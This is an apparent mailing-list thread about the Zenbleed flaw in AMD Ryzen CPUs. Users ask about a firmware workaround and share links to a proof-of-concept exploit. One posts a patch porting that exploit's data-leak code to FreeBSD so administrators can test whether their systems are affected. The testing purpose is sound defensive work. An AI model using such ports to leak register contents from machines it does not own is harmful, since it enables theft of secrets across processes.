On 23. 7. 27., Jung-uk Kim wrote:
On 23. 7. 27., mike tancsa wrote:On 7/26/2023 5:46 PM, Shawn Webb wrote:On Wed, Jul 26, 2023 at 08:34:56PM +0000, 0x1eef wrote:Hello,I was curious if there are plans to apply the "chicken bit" workaround for the Ryzen line of processors. A firmware update is not scheduled to be released until Nov or Dec at the earliest. Thanks.For those that would like to test if their systems are affected, this proof-of-concept was reported to work on at least one system: https://git.hardenedbsd.org/shawn.webb/zenbleed/-/tree/shawn.webb/bsd/main Building it depends on gmake and nasm. You'll want to be on the shawn.webb/bsd/main branch.Thanks for that. Is there a way to compile on RELENG_12 or is it 13 only ?% gmake cc -O0 -ggdb3 -march=znver2 -c -o pattern.o pattern.c pattern.c:15:10: fatal error: 'sys/sysinfo.h' file not found #include <sys/sysinfo.h> ^~~~~~~~~~~~~~~ 1 error generated. gmake: *** [<builtin>: pattern.o] Error 1I guess you checked out a wrong branch. Please see the attached minimal patch I made for FreeBSD. I think it will work on any supported FreeBSD branches. Note the original exploit is available from here:https://lock.cmpxchg8b.com/files/zenbleed-v5.tar.gz
With the forgotten attachment. Jung-uk Kim
--- zenbleed/pattern.c.orig 2023-07-23 10:45:32.000000000 -0400
+++ zenbleed/pattern.c 2023-07-27 12:26:28.324346000 -0400
@@ -6,13 +6,14 @@
#include <stdbool.h>
#include <x86intrin.h>
#include <sched.h>
+#ifdef __linux__
#include <syscall.h>
+#endif
#include <err.h>
#include <pthread.h>
#include <assert.h>
#include <ctype.h>
#include <signal.h>
-#include <sys/sysinfo.h>
#include "zenbleed.h"
@@ -82,7 +83,7 @@ void * pattern_leak_consumer(void *param)
}
}
- fprintf(stdout, "%.*s", matchlen, matchptr);
+ fprintf(stdout, "%.*s", (int)matchlen, matchptr);
// If the match is bigger than our pattern size, we skip to the end of it.
if (matchlen > patlen) {
--- zenbleed/util.c.orig 2023-07-23 10:45:32.000000000 -0400
+++ zenbleed/util.c 2023-07-27 13:26:09.509588000 -0400
@@ -46,6 +46,9 @@ bool num_inrange(char *range, int num)
bool num_inrange(char *range, int num)
{
char *r, *s, *e;
+#ifndef __linux__
+ size_t len;
+#endif
// Example:
// 1,2,3,4-8,2
@@ -53,7 +56,14 @@ bool num_inrange(char *range, int num)
if (range == NULL)
return false;
- s = strtok_r(strdupa(range), ",", &r);
+#ifndef __linux__
+ len = strlen(range) + 1;
+ s = alloca(len);
+ memcpy(s, range, len);
+#else
+ s = strdupa(range);
+#endif
+ s = strtok_r(s, ",", &r);
while (s) {
int start;
--- zenbleed/zenbleed.c.orig 2023-07-23 10:45:32.000000000 -0400
+++ zenbleed/zenbleed.c 2023-07-27 13:07:27.502780000 -0400
@@ -6,13 +6,16 @@
#include <stdbool.h>
#include <x86intrin.h>
#include <sched.h>
+#ifdef __FreeBSD__
+#include <pthread_np.h>
+#else
#include <syscall.h>
+#endif
#include <err.h>
#include <pthread.h>
#include <assert.h>
#include <ctype.h>
#include <signal.h>
-#include <sys/sysinfo.h>
#include "zenbleed.h"
@@ -298,7 +301,7 @@ int main(int argc, char **argv) {
}
// We spawn a thread on every evailable core and start leaking to see what we get.
- ncpus = get_nprocs();
+ ncpus = sysconf(_SC_NPROCESSORS_ONLN);
thread_arg_t* args = calloc(sizeof(thread_arg_t), ncpus);
threads = calloc(sizeof(pthread_t), ncpus);
OpenPGP_signature
Description: OpenPGP digital signature
